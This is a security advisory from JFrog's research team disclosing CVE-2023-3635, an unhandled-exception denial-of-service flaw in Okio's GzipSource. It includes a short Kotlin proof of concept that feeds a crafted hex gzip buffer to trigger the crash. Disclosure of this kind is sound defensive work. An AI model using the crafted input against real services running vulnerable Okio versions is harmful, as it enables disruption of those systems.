JFrog Security Research
< Back

XRAY-589879 - Okio GzipSource unhandled exception Denial of Service

CVE-2023-3635 | CVSS 5.9

JFrog Severity:medium

Discovered ByUriya Yavnieliof the JFrog Security Research Team

Published 12 Jul, 2023 | Last updated 12 Jul, 2023

Okio GzipSource unhandled exception Denial of Service

com.squareup.okio:okio

(,3.4.0)

GzipSource does not handle an exception that might be raised when parsing a malformed gzip buffer. This may lead to denial of service of the Okio client when handling a crafted GZIP archive, by using the GzipSource class.

val gzBuf: Buffer = Buffer()
    try {
        val gzByteString: ByteString = ("1f8b41ff424242424343ffff").decodeHex()
        gzBuf.write(gzByteString)
        val gz: GzipSource = GzipSource(gzBuf)
        val sinkBuf: Buffer = Buffer()
        gz.read(sinkBuf, 5)
    }
    catch(e: IOException) {
        println("got error: " + e.toString())
    }

No mitigations are supplied for this issue

https://github.com/square/okio/commit/81bce1a30af244550b0324597720e4799281da7b

< Back